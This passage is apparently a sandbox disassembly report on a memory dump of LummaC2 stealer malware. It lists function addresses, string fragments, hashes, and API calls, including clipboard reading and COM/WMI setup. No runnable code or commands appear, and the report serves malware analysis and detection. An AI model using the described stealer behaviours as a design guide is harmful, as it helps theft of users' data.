b, xrefs: 00484895
_, xrefs: 00484A84
h, xrefs: 0048486B
1, xrefs: 0048491A
O, xrefs: 00484880
b, xrefs: 00484A7C
<, xrefs: 00484A3A
l, xrefs: 00484887

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: )$0$0$1$2$3$8$:$<$<$>$>$?$O$]$_$`$b$b$d$f$f$h$j$l$n$t
API String ID: 0-3467771618
Opcode ID: cc54ff3078848b66211681b35365d1fc93f0153c79ba700f17b68bd5472feed7
Instruction ID: a54c522f46bda143b55ba3e2c0579c4214a36db10f1ee0a537b05d088ad2386e
Opcode Fuzzy Hash: cc54ff3078848b66211681b35365d1fc93f0153c79ba700f17b68bd5472feed7
Instruction Fuzzy Hash: ACE193219087E98EDB22C67C88443CDBFB15B53324F1847D9D4E86B3D2C7754A86CB66

Function 00481D10 Relevance: 28.2, APIs: 2, Strings: 14, Instructions: 163
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemMetrics.USER32 ref: 00481D59
GetSystemMetrics.USER32 ref: 00481D69

Strings

kI, xrefs: 00481F98
hkI, xrefs: 00481FFB
pkI, xrefs: 00482006
@kI, xrefs: 00481FC4
XkI, xrefs: 00481FE5
(kI, xrefs: 00481FA3
jI, xrefs: 00481F4B
PkI, xrefs: 00481FDA
8kI, xrefs: 00481FB9
jI, xrefs: 00481F40
0kI, xrefs: 00481FAE
, xrefs: 00481E56
HkI, xrefs: 00481FCF
`kI, xrefs: 00481FF0

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: MetricsSystem
String ID: $ kI$(kI$0kI$8kI$@kI$HkI$PkI$XkI$`kI$hkI$pkI$jI$jI
API String ID: 4116985748-494477041
Opcode ID: dc5776f274f5bc71a69be045b9077eb8d84a854bdbfc2e420d78cd44665cf5e7
Instruction ID: ca787c50b3d1130e43ddf21f247e53351645eccd5a6ada948ed1d4aabe9c0636
Opcode Fuzzy Hash: dc5776f274f5bc71a69be045b9077eb8d84a854bdbfc2e420d78cd44665cf5e7
Instruction Fuzzy Hash: 4AA16AB04193818BD771DF18C448B9BBFE0BBC5308F518A2ED59C9B650D7B99448CB8A

Function 00486BF0 Relevance: 20.0, APIs: 10, Strings: 1, Instructions: 718memorycomCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(0049168C,00000000,00000001,0049167C,00000000), ref: 00486E11
SysAllocString.OLEAUT32(F5A3FBA8), ref: 00486EDA
CoSetProxyBlanket.OLE32(D77F9D52,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00486F18
SysAllocString.OLEAUT32(68DA6AD6), ref: 00486F6D
SysAllocString.OLEAUT32(BD01C371), ref: 00487025
VariantInit.OLEAUT32(F8FBFAF5), ref: 00487097
SysFreeString.OLEAUT32(?), ref: 00487382
SysFreeString.OLEAUT32(?), ref: 00487388
SysFreeString.OLEAUT32(00000000), ref: 00487399

Strings

\, xrefs: 00486DCB

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: String$AllocFree$BlanketCreateInitInstanceProxyVariant
String ID: \
API String ID: 2737081056-2967466578
Opcode ID: 20f297fa3d67303740fa67cf29294c382313666a83706a54b1fefe6cdb07d780
Instruction ID: af58818821d7372ce5e7e1044d2d46bdb872023e99b856611cc3c4580ba68ef8
Opcode Fuzzy Hash: 20f297fa3d67303740fa67cf29294c382313666a83706a54b1fefe6cdb07d780
Instruction Fuzzy Hash: 4332E071A483408FD714DF28C89076FBBE1EBD5314F28892EE9958B391D778D805CB56

Function 0045B14F Relevance: 15.5, Strings: 12, Instructions: 473COMMON

Download Yara Rule

Strings

fPcV, xrefs: 0045B188
7, xrefs: 0045B5E9
6\/b, xrefs: 0045B19D
.L~R, xrefs: 0045B181
EtEz, xrefs: 0045B1D6
DxY~, xrefs: 0045B1E0
gTuZ, xrefs: 0045B18F
BpAv, xrefs: 0045B1CC
Kh;n, xrefs: 0045B1B8
9D,J, xrefs: 0045B173
'H%N, xrefs: 0045B17A
;lMr, xrefs: 0045B1C2

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 'H%N$.L~R$6\/b$7$9D,J$;lMr$BpAv$DxY~$EtEz$Kh;n$fPcV$gTuZ
API String ID: 0-762781089
Opcode ID: 0cc1cc722c4b1b03ea21c0b8663c0f27979c07110ff247293c9118db2147dcb8
Instruction ID: 27d4173c9b00eadd672dc8585638236e602d2dce2062f9c76039dc81613569e5
Opcode Fuzzy Hash: 0cc1cc722c4b1b03ea21c0b8663c0f27979c07110ff247293c9118db2147dcb8
Instruction Fuzzy Hash: D202A9B5204B01DFD324CF65D891B96BBE2FB99301F1489BDD5AA8B7A0DB34A805CF44

Function 00473FF1 Relevance: 14.9, Strings: 11, Instructions: 1151COMMON

Download Yara Rule

Strings

~C, xrefs: 004747E7
XY, xrefs: 00474FE1
`.`,, xrefs: 00474881
^_, xrefs: 00474223
?2, xrefs: 00474418
GZ, xrefs: 0047442E
}{, xrefs: 004747D1
~x, xrefs: 004747DC
RQ, xrefs: 00474423
|*z(, xrefs: 0047488C
Um, xrefs: 004747F2

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: ?2$GZ$RQ$Um$XY$^_$`.`,$|*z($}{$~C$~x
API String ID: 0-3286641888
Opcode ID: 86284d2c41ee510f19d0507cb567c3b13eb53a4911bf0aa4ce0fe4fd5b809f06
Instruction ID: 737837cd885773aef00c2e1b83e84fb246dc8a4a93f533616ec6d90cfae21974
Opcode Fuzzy Hash: 86284d2c41ee510f19d0507cb567c3b13eb53a4911bf0aa4ce0fe4fd5b809f06
Instruction Fuzzy Hash: CAA284B160C7858BC334CF24D8417AFBBF2EB95304F50892DE5DA9B251E7749906CB8A

Function 00460F71 Relevance: 14.5, Strings: 11, Instructions: 732COMMON

Download Yara Rule

Strings

V, xrefs: 0046187A
E, xrefs: 00461872
t, xrefs: 004612E2
F, xrefs: 00461743
F, xrefs: 00460FF4
}, xrefs: 00460F7F
5, xrefs: 0046144C
T, xrefs: 0046186A
x, xrefs: 004617E7
*, xrefs: 00461579
8, xrefs: 00461571

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: *$5$8$E$F$F$T$V$t$x$}
API String ID: 0-2030276459
Opcode ID: 122f4863c7ae64200649772b4fa7eb0b0501007d29ff00b520a5d92ace762c04
Instruction ID: 4f1b4fe37e4c3803fed1e24cb172d2721a025f1962a6464f2d25d665f51a7c12
Opcode Fuzzy Hash: 122f4863c7ae64200649772b4fa7eb0b0501007d29ff00b520a5d92ace762c04
Instruction Fuzzy Hash: 31528F7160D7908BD724DB38C4953AFBBE1ABC5314F188A2ED8D9C7392E63888458B47

Function 00471550 Relevance: 14.2, Strings: 11, Instructions: 497COMMON

Download Yara Rule

Strings

[, xrefs: 00471957
,, xrefs: 00471A6C
e, xrefs: 0047176C
R, xrefs: 0047195C
U, xrefs: 00471952
\, xrefs: 00471B06
\, xrefs: 0047175D
d, xrefs: 00471767
k, xrefs: 00471762
!@, xrefs: 00471583
P, xrefs: 00471961

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: AllocateHeap
String ID: !@$,$P$R$U$[$\$\$d$e$k
API String ID: 1279760036-3655135053
Opcode ID: 79a89be621ccc6e7c72cc09603a4080010835fa3fca2991ecb3af4b247ecf296
Instruction ID: 659678683b0e7cd1a6e56accf18c35ff04aef8b401d3f14a15e31b94dc913cf1
Opcode Fuzzy Hash: 79a89be621ccc6e7c72cc09603a4080010835fa3fca2991ecb3af4b247ecf296
Instruction Fuzzy Hash: 2722A17160C7808FD3248F2CC4913AFBBE1AB96314F14896EE5D9873A2D7799845CB4B

Function 0046E230 Relevance: 9.9, Strings: 7, Instructions: 1107COMMON

Download Yara Rule

Strings

WYRT, xrefs: 0046E566
@Nxz, xrefs: 0046E536
pKp^, xrefs: 0046E54E
FEtp, xrefs: 0046E5DF
vvFE, xrefs: 0046E546
f, xrefs: 0046E438
]^he, xrefs: 0046E55E

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: @Nxz$FEtp$WYRT$]^he$f$pKp^$vvFE
API String ID: 0-4211064948
Opcode ID: 95f97acd79ca5944b6891614ffefbfb2bbd95e9716a6facddbd8dcbac1caeff0
Instruction ID: 36a553d92b7d2c47377ea4166d219b6e8673a56a1ef95eac16cf86c4e5c43164
Opcode Fuzzy Hash: 95f97acd79ca5944b6891614ffefbfb2bbd95e9716a6facddbd8dcbac1caeff0
Instruction Fuzzy Hash: 8A72497550C3418FC725CF29C45062FBBE1AFD5314F188A6EE4E58B392E6399906CB87

Function 00465640 Relevance: 9.7, Strings: 7, Instructions: 943COMMON

Download Yara Rule

Strings

Fi, xrefs: 00465D71
JHN], xrefs: 00465D66
YU]&, xrefs: 00466170
UR, xrefs: 00465AE3
s|}, xrefs: 0046606E
wq, xrefs: 00466063
>j%h, xrefs: 00465976

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: >j%h$Fi$JHN]$UR$YU]&$s|}$wq
API String ID: 0-2664314784
Opcode ID: 7cef19e1809deaeb399fad793b5c60ff1b7ea74c5808ed1bc758532e5b52241b
Instruction ID: 566f1c72d2576ec0a6f2dbef43c9390ab6e19e7342cd6fea8d4b677b5f660ac7
Opcode Fuzzy Hash: 7cef19e1809deaeb399fad793b5c60ff1b7ea74c5808ed1bc758532e5b52241b
Instruction Fuzzy Hash: 2F5226B15087408BD7249F29D851BAFB7E5EFD5314F184A3EE48987391EB389801CB57

Function 00461A94 Relevance: 9.3, Strings: 7, Instructions: 531COMMON

Download Yara Rule

Strings

;, xrefs: 00461B11
U, xrefs: 0046205E
1, xrefs: 00461C89
c, xrefs: 00462059
], xrefs: 00461DB7
%, xrefs: 00461E31
', xrefs: 00461AA7

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: %$'$1$;$U$]$c
API String ID: 0-3216539101
Opcode ID: 767f629b2cdc653f98288b561a55af239b7edc17873772d879ea3c71de018e34
Instruction ID: 21199eac565afe82bfae343e5f3a0309d6d614bbe80cdef5fbf79a2531219997
Opcode Fuzzy Hash: 767f629b2cdc653f98288b561a55af239b7edc17873772d879ea3c71de018e34
Instruction Fuzzy Hash: C812D57150C7908BC764DF38C49539FBBE1AB85324F188A2EE9E9873D2E6398445CB47

Function 00481B10 Relevance: 9.2, APIs: 6, Instructions: 152clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00481B24
GetClipboardData.USER32 ref: 00481B3F
GlobalLock.KERNEL32 ref: 00481B58
GetWindowLongW.USER32 ref: 00481BC7
GlobalUnlock.KERNEL32 ref: 00481CE7
CloseClipboard.USER32 ref: 00481CF4

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID: Clipboard$Global$CloseDataLockLongOpenUnlockWindow
String ID:
API String ID: 2832541153-0
Opcode ID: 08e9a78213b3b9412c1f1487c57b736bb690ca9accfeaff47d334cbc52ab7c5d
Instruction ID: cc570a52f296eb2ac3bd71347b2f3129b44155d9921dfd0a434409b543bbb321
Opcode Fuzzy Hash: 08e9a78213b3b9412c1f1487c57b736bb690ca9accfeaff47d334cbc52ab7c5d
Instruction Fuzzy Hash: 1651E37260C7818FC300AFBC988525EBAE1ABD5224F184B3FE5E5873E1D6788546C35B

Function 004726D3 Relevance: 8.3, Strings: 6, Instructions: 769COMMON

Download Yara Rule

Strings

1{, xrefs: 00472A0E
20G, xrefs: 00473026
?<, xrefs: 00472AB6
zw, xrefs: 00472A06
0, xrefs: 00472888
r~, xrefs: 00472A16

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 0$1{$20G$?<$r~$zw
API String ID: 0-3559356604
Opcode ID: 644837c707bdcb0353926de8c9433b4fc9b3f25b189729f0288daa7aab10ad15
Instruction ID: b757b26ffa9454072be47b993a62b4bf3f2f70762bb87d90c1c8aa4b348f7423
Opcode Fuzzy Hash: 644837c707bdcb0353926de8c9433b4fc9b3f25b189729f0288daa7aab10ad15
Instruction Fuzzy Hash: 6542E1756083518FD728CF28D89076BBBE1FBD6300F19897DE8959B391D7789802CB86

Function 00459290 Relevance: 7.9, Strings: 6, Instructions: 429COMMON

Download Yara Rule

Strings

Egx|, xrefs: 004592CA
CM, xrefs: 00459608
clfg, xrefs: 004592E2
RRP\, xrefs: 004596DE
kj, xrefs: 00459458
C, xrefs: 004595B5

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: C$CM$Egx|$RRP\$clfg$kj
API String ID: 0-2969717086
Opcode ID: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction ID: 3008dcee50d09e8a7f2717867bb58b0a83cfd9ddbbc07e4201e2343ac21e8eb2
Opcode Fuzzy Hash: 7205f9d9b45afb0796eec4366d0d469d1e374ff805331be11343e4905182765d
Instruction Fuzzy Hash: 32C1067120C3908BD315CF3984A03ABBBE29FD7215F19896DE8E54B386D7394D0ACB56

Function 00468095 Relevance: 7.6, Strings: 5, Instructions: 1319COMMON

Download Yara Rule

Strings

K, xrefs: 00468162
Q230, xrefs: 00468B93
(, xrefs: 004682E1
d, xrefs: 00468726
', xrefs: 00469102

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: '$K$Q230$d$(
API String ID: 0-937174541
Opcode ID: 69c9f85cb2bc4b838f9b002c95fdf8c2f410d2be9b2b3ab4d7f5106564e8d89f
Instruction ID: 99de31eab5278e03c56754aa48ad9c2c89859af825be7e87c914188b4d8da95e
Opcode Fuzzy Hash: 69c9f85cb2bc4b838f9b002c95fdf8c2f410d2be9b2b3ab4d7f5106564e8d89f
Instruction Fuzzy Hash: 909223716083418BD724CF28C8917ABB7E2EFD6314F188A6EE4C58B391EB788945C757

Function 004770F9 Relevance: 5.8, Strings: 4, Instructions: 802COMMON

Download Yara Rule

Strings

p, xrefs: 004772D9
LL, xrefs: 004772E0
=&2), xrefs: 004774BA
>.8, xrefs: 004774AC

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: p$=&2)$>.8$LL
API String ID: 0-1181295447
Opcode ID: 0a1426d62dc279ebc07ea956a0a2df6ec06ce7bfc617fee926ec63fd19d0d3e0
Instruction ID: 113e4b304c2ba4fa4c07ba6120968587bd9319daf14d40bf73014ff91d5612b8
Opcode Fuzzy Hash: 0a1426d62dc279ebc07ea956a0a2df6ec06ce7bfc617fee926ec63fd19d0d3e0
Instruction Fuzzy Hash: 4B422BB5A01611CFDB18CF24D8516AEB7B2FF85310F29827ED819AB395D738A811CBD4

Function 0045C97C Relevance: 5.5, Strings: 4, Instructions: 533COMMON

Download Yara Rule

Strings

r~, xrefs: 0045D02F
1{, xrefs: 0045D024
zw, xrefs: 0045D019
?<, xrefs: 0045D0C2

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: 1{$?<$r~$zw
API String ID: 0-614760689
Opcode ID: 5a8da7d52b0d9de0679c8e70b938717c952e8131cbea7f18954fe82fb631160f
Instruction ID: 3d47af34f598025809d5324efe11dc99cff68cb6b84798b25e952e28f0ce4180
Opcode Fuzzy Hash: 5a8da7d52b0d9de0679c8e70b938717c952e8131cbea7f18954fe82fb631160f
Instruction Fuzzy Hash: 8002A8B01093C18ED735CF24D4947EFBBE1ABE6348F18896DC8D99B242C778454ACB96

Function 0046C205 Relevance: 5.5, Strings: 4, Instructions: 508COMMON

Download Yara Rule

Strings

{x, xrefs: 0046C6B5
g`a, xrefs: 0046C864
|r, xrefs: 0046C5CC
./, xrefs: 0046C544

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: ./${x$g`a$|r
API String ID: 0-1262855476
Opcode ID: 1fef04c58e06a8218691681871634d09926bdde983655087f368aec7487ebf87
Instruction ID: d23e2a704084987661885771fdc6ade5213da26098d0f76aced3b85e2e90238b
Opcode Fuzzy Hash: 1fef04c58e06a8218691681871634d09926bdde983655087f368aec7487ebf87
Instruction Fuzzy Hash: 58F12877A5C3505BD308DF6A8C4265FFAE2EBD4304F19C92DE8D49B345DA388A058B87

Function 004759B0 Relevance: 5.4, Strings: 4, Instructions: 408COMMON

Download Yara Rule

Strings

/V, xrefs: 00475A57
Y\, xrefs: 00475A5F
!J, xrefs: 00475A67
U+, xrefs: 00475A4F

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

Associated: 00000002.00000002.2678561543.0000000000450000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678623474.0000000000490000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678647447.0000000000493000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678690187.0000000000497000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2678708086.00000000004A1000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_450000_LummaC2.jbxd

Similarity

API ID:
String ID: !J$/V$U+$Y\
API String ID: 0-2652480667
Opcode ID: 2d9bea7ed0aa99f6479486b9a90bb042d73d905f1c51047cfca8af0a7f8b5ce0
Instruction ID: 8b98a6c0c8654b4059384afe11302e2a649ca157a4ee802fc4ecc0f864c5e533
Opcode Fuzzy Hash: 2d9bea7ed0aa99f6479486b9a90bb042d73d905f1c51047cfca8af0a7f8b5ce0
Instruction Fuzzy Hash: A5E11FB5208300DFE324EF25E8817ABB7E1FB91304F54883EE1C94B2A2D7749815CB5A

Function 0045AB20 Relevance: 5.4, Strings: 4, Instructions: 405COMMON

Download Yara Rule

Strings

tefr, xrefs: 0045ADEE
tefr, xrefs: 0045AFAC, 0045AEE3, 0045AF78, 0045AD64, 0045AED7, 0045AD20, 0045AF81
a|}r, xrefs: 0045AC66
nww, xrefs: 0045AD87

Memory Dump Source

Source File: 00000002.00000002.2678589392.0000000000451000.00000020.00000001.01000000.00000007.sdmp, Offset: 00450000, based on PE: true

